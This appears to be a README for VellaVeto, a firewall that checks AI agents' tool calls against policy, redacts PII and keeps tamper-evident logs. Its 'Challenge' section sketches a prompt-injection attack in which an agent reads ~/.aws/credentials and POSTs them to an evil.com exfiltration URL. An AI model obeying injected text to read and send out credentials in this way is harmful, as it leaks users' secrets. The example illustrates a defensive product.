VellaVeto: Agent Interaction Firewall

VellaVeto serves as a critical agent interaction firewall, establishing a secure runtime boundary where AI agents interact with tools, services, and users. By scrutinizing every side-effecting decision at this boundary, VellaVeto ensures that tool calls comply with established policies, requiring explicit approvals for irreversible actions, isolating sessions to enhance security, and maintaining a tamper-evident audit trail through a structured ACIS decision envelope. This solution can be deployed as a standard input/output proxy, HTTP gateway, or consumer-side privacy shield.

The Challenge

As AI agents have the ability to read files, make HTTP requests, and execute commands, the necessity for centralized security controls becomes evident. Without these controls in place, vulnerabilities can be exploited:

Agent receives prompt injection
  → reads ~/.aws/credentials
  → POST https://evil.com/exfil?data=AKIA...
  → no audit trail, no one notices

Numerous security vulnerabilities have been discovered within the MCP ecosystem, highlighting the urgent need for robust frameworks like VellaVeto. It acts as the safeguard, ensuring that every action is evaluated against predefined policies, logging every decision in a tamper-evident manner.

Agent attempts: read_file("/home/user/.aws/credentials")
  → VellaVeto evaluates against policy
  → Deny { reason: "path blocked by credential-protection rule" }
  → Logged with SHA-256 chain + Ed25519 checkpoint
  → Agent never sees the file contents

Consumer Shield: Enhancing User Privacy

VellaVeto also provides a Consumer Shield, which safeguards users from potential oversights by AI providers who might improperly access sensitive information during tool calls. This feature ensures individual privacy, transposing private information into placeholders before an AI provider processes requests:

You type: "Read my medical records at /home/alice/health/lab-results.pdf"
  → Shield intercepts before the provider sees it
  → PII replaced: "Read my medical records at [PII_PATH_1]"
  → Provider processes the sanitized request
  → Response comes back, Shield restores original paths
  → Encrypted local audit proves what was shared and what was stripped

Features of VellaVeto:

• Policy Enforcement: Requires explicit policy evaluations on all tool invocations, ensuring detailed scrutiny and compliance.
• Credential Management: Implements session isolation, credential rotation, and PII sanitization to protect sensitive data.
• Tamper-Evident Logs: Maintains a comprehensive audit trail of decisions made during interactions, ensuring accountability and traceability.
• Dynamic Deployment: Easy deployment options via command line or Docker, allowing for various levels of protection (shield, fortress, vault) based on use-case needs.

Quick Start

To quickly protect AI tools, select a desired protection level with VellaVeto:

# For Shield protection
vellaveto-proxy --protect shield -- npx @modelcontextprotocol/server-filesystem /tmp

Deploying the Consumer Shield is equally straightforward:

vellaveto-shield --config consumer-shield.toml -- npx @anthropic/claude-desktop

Architecture and Operation

VellaVeto enforces five crucial boundary invariants at the agent runtime point:

1. No tool invocation without capability verification.
2. Delegated capabilities are always monotonic.
3. Requires signed approvals for irreversible actions.
4. Prevents cross-session leakage to maintain coherence in actions.
5. Separates untrusted content from privileged actions to avoid exploitation.

This architecture supports multiple transports, ensuring a seamless and consistent mediation across diverse operational environments (HTTP, gRPC, etc.).

For a comprehensive understanding of the extensive capabilities, formal verification methodologies employed, and security guarantees, users can refer to the detailed documentation and guidelines provided within the repository.